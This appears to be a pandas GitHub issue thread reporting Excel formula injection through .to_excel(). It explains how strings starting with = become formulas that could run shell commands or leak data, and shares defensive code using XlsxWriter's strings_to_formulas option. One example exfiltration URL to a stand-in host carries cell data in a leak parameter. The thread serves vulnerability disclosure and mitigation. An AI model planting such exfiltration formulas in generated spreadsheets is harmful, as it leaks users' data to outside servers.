Excel formula injection in pandas .to_excel() #29095
Comments
Why do you think that? It's not clear to me one way or another.
The default behavior of both openpyxl and xlsxwriter is to treat strings starting with = as formulas.
One reason why I think this should not happen by default is that it's not documented. There is no reason for tabular data cells starting with One other reason why I think this should not happen (or at least be configurable) is that the pandas user might legitimately need to generate cells with text/data starting with One last reason is that this can be a security vulnerability. :)
Yes, this is the default behavior of these libraries. I think this behavior is debatable, as it can easily open security issues in software using these libraries. It's trying to be helpful but it really is dangerous (*). It would probably be better for them to migrate to a safer default (and warn about the security considerations around this) and add warnings about this in the documentation. However, both libraries provide a way to prevent this from happening, which is actually not possible in pandas. (*): This is not unlike PyYAML moving away from unsafe YAML loading by default. Using unsafe YAML loading by default was very convenient but was quite dangerous.
Have you opened issues with openpyxl and xlwt?
I did not (yet) because I did not consider it was clearly a vulnerability in openpyxl and xlsxwriter.
FWIW: I think we also had a Tidelift discussion for this too...
How is this true at all? We already pass through construction options; xlsxwriter has an option for safe handling, and that is our default engine.
It seems xlsxwriter isn't going to change its default: jmcnamara/XlsxWriter#663. At this point, I think the best option is to add an example to the pandas docs about how to properly pass the option through to the engine. Are you interested in working on that @randomstuff?
For reference, here is an example from the XlsxWriter docs that shows how to pass XlsxWriter options via the Pandas interface.
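A minimal sketch of that pass-through, assuming XlsxWriter is installed and a pandas version where ExcelWriter accepts engine_kwargs (1.3 or later, to my knowledge). strings_to_formulas is XlsxWriter's constructor option; the helper name write_plain_strings is made up for illustration and is not part of pandas.

```python
def write_plain_strings(df, path):
    """Write df to an .xlsx file, keeping '='-prefixed strings as plain text."""
    # Imported lazily so this snippet loads even when the optional
    # dependencies (pandas, XlsxWriter) are not installed.
    import pandas as pd

    with pd.ExcelWriter(
        path,
        engine="xlsxwriter",
        # Forwarded to the xlsxwriter.Workbook constructor as its options dict.
        engine_kwargs={"options": {"strings_to_formulas": False}},
    ) as writer:
        df.to_excel(writer, index=False)


# Example call (hypothetical data):
# write_plain_strings(pd.DataFrame({"value": ["=1+1"]}), "test.xlsx")
```

With this option the cell should show the literal text =1+1 instead of the computed value.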
Would it make sense to be able to pass
Wouldn't it be better to make formula expansion opt-in? It would be a slight breaking change in the API, but it would make the Excel output more consistent with the other output formats by default:
import pandas as pd
df = pd.DataFrame(["=a"])
df.to_excel("test.xlsx")
df.to_html("test.html")
People who actually need formulas would only need to add an option.
@TomAugspurger, yes, I might be interested in doing that. If formula expansion (by default) is considered a feature instead of a bug, I think I should document this behavior.
Code Sample
Problem description
When exporting DataFrames to Excel files (.xlsx), pandas converts strings starting with = into Excel formulas. This happens with both .xlsx engines (openpyxl and xlsxwriter).
Expected Output
I expect the Excel file to contain a cell with the text:
This is a correctness issue: it is probably not what the user expects (especially since this behavior is not documented).
I'd argue this is a security vulnerability as well.
Security considerations
I think this is a vulnerability in pandas, as it could be used by an attacker to inject Excel formulas into the generated .xlsx file: this could be used to trigger shell command execution (when opened in Excel) and data exfiltration (works in LibreOffice as well).
Relationship with CSV injection
This is different from CSV-based injection (but related).
When using the CSV format, cells starting with = do not have to be treated as formulas: it is the consuming software's fault if it processes the data as a formula, and we can argue [2] that it is not a security issue in the producing software. Moreover, there is no clear way for the producing software to prevent this without altering the original data.
However, when exporting to Excel files, each cell can be typed as either a string or a formula, and it is possible to have cells starting with = which are not formulas: it is the producing software's responsibility to generate the correct cell.
I would even argue that converting to Excel files instead of CSV files would be a safer route when producing files to be consumed by spreadsheet software, because we can prevent this injection from happening.
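To make the typing point concrete, here is a rough standard-library sketch of how a worksheet cell can be represented in SpreadsheetML, the XML stored inside an .xlsx file. A formula cell carries an f child element, while text can be stored as an inline string (t="inlineStr") whatever its first character is. The helper names are illustrative, namespaces are omitted for brevity, and real writers commonly use a shared-strings table rather than inline strings.

```python
import xml.etree.ElementTree as ET


def text_cell(ref, text):
    """Build a cell whose content is stored as literal text."""
    cell = ET.Element("c", {"r": ref, "t": "inlineStr"})
    ET.SubElement(ET.SubElement(cell, "is"), "t").text = text
    return cell


def formula_cell(ref, expression):
    """Build a cell whose content is evaluated as a formula."""
    cell = ET.Element("c", {"r": ref})
    # The stored expression omits the leading '='.
    ET.SubElement(cell, "f").text = expression
    return cell


def is_formula(cell):
    """A cell is a formula because it has an <f> child, not because of its text."""
    return cell.find("f") is not None


literal = text_cell("A1", "=1+1")      # text that merely starts with '='
computed = formula_cell("B1", "1+1")   # an actual formula
print(ET.tostring(literal, encoding="unicode"))
print(ET.tostring(computed, encoding="unicode"))
```

CSV has no equivalent of this distinction: the file carries only the characters, so the consumer decides how to interpret them.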
Example 1: shell command execution
Here's a minimal example (derived from [4]):
The resulting XLSX file contains:
Notice how the first cell was interpreted as a plain string:
whereas the second was expanded as an Excel formula:
This happens with both XLSX backends (XlsxWriter and openpyxl). It could be argued that the problem actually lies in the underlying libraries. It is, however, possible to prevent formula injection when using these two libraries. I have patches which fix this issue in pandas (see pull request).
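One way to check which cells ended up as formulas is to look inside the generated file, which is a ZIP archive of XML parts. The sketch below uses only the standard library. formula_cells is a hypothetical helper, and the default part name xl/worksheets/sheet1.xml is an assumption about the typical layout of a single-sheet file.

```python
import zipfile
import xml.etree.ElementTree as ET

# Namespace used by SpreadsheetML worksheet parts.
NS = {"m": "http://schemas.openxmlformats.org/spreadsheetml/2006/main"}


def formula_cells(xlsx, sheet_part="xl/worksheets/sheet1.xml"):
    """Return {cell reference: formula text} for one worksheet part.

    `xlsx` may be a path or a binary file-like object.
    """
    with zipfile.ZipFile(xlsx) as archive:
        root = ET.fromstring(archive.read(sheet_part))
    found = {}
    for cell in root.iterfind(".//m:c", NS):
        formula = cell.find("m:f", NS)
        if formula is not None:
            found[cell.get("r")] = formula.text
    return found
```

An empty result for a file built from untrusted strings would suggest that no string was promoted to a formula.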
In Excel, this formula can execute a local system command. When used with this payload, Excel actually warns before executing the shell command [1]:
The Excel file might actually be coming from a trusted source (a trusted pandas script executed from a trusted environment): the user would then legitimately want to click on "Yes". However, an attacker could exploit this behavior in pandas to inject a malicious formula into the trusted Excel file.
Example 2: data exfiltration
Another possibility (which can be triggered through LibreOffice) is data exfiltration from the Excel file to a remote server:
Let's take this example (derived from [3]):
It generates a link to:
http://www.example.com/?leak=some%20data
Clicking on this link can be used to exfiltrate data (in this case, the B2 cell from the spreadsheet) to a remote server.
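The shape of that URL can be reproduced with the standard library. This sketch only illustrates how a cell value such as "some data" ends up percent-encoded in the query string; the variable names are illustrative and the spreadsheet formula itself is not reproduced here.

```python
from urllib.parse import quote

base_url = "http://www.example.com/?leak="
cell_value = "some data"  # stands in for the content of cell B2

# Spaces are percent-encoded, so the value travels as part of the URL.
leak_url = base_url + quote(cell_value)
print(leak_url)
```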
References
[1] https://youtu.be/C1o5uVOaufU?t=364
[2] https://sites.google.com/site/bughunteruniversity/nonvuln/csv-excel-formula-injection
[3] https://www.notsosecure.com/data-exfiltration-formula-injection/
[4] http://georgemauer.net/2017/10/07/csv-injection.html
Resolution
I think the proper way to handle this is to disable Excel formula injection through .to_excel().
If this behavior is useful for some users, it might be controlled with a parameter of .to_excel(). In this case, the documentation should probably include a warning about the security implications of enabling this feature. I believe it would be safer to disable this option by default at some point (e.g. for pandas 1.0).
Output of
pd.show_versions()